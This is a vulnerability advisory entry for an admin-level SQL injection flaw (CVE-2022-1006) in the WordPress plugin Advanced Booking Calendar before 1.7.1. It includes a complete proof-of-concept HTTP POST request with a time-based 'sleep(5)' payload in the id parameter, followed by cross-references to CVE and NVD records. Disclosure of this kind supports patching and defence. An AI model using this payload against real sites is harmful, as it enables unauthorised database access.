Lucene search
YICHENG LIU-ZTE CHENFENG lab WPEX-ID:C5569317-B8C8-4524-8375-3E2369BDCC68HistoryMar 21, 2022 - 12:00 a.m.
Advanced Booking Calendar < 1.7.1 - Admin+ SQLi
2022-03-2100:00:00
YICHENG LIU-ZTE CHENFENG lab
79
0.001 Low
EPSS
Percentile
41.2%
The plugin does not sanitise and escape the id parameter when editing Calendars, which could allow high privilege users such as admin to perform SQL injection attacks
Edit an existing Seasons & Calendars (/wp-admin/admin.php?page=advanced-booking-calendar-show-seasons-calendars) and tamper the id parameter
POST /wp-admin/admin-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
Origin: http://192.168.9.32
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1
action=abc_booking_editCalendar&id=1+and+sleep(5)&name=test&maxAvailabilities=1&maxUnits=5&pricePreset=9000&minimumStayPreset=1&partlyBooked=1&page_id=0&infotext=Related
wpvulndb
wpvulndb
Advanced Booking Calendar < 1.7.1 - Admin+ SQLi
2022-03-21 00:00:00
cve
cve
CVE-2022-1006
2022-04-11 15:15:08
nvd
nvd
CVE-2022-1006
2022-04-11 15:15:08
prion
prion
Sql injection
2022-04-11 15:15:00
cnvd
cnvd
cvelist
cvelist
CVE-2022-1006 Advanced Booking Calendar < 1.7.1 - Admin+ SQLi
2022-04-11 14:41:04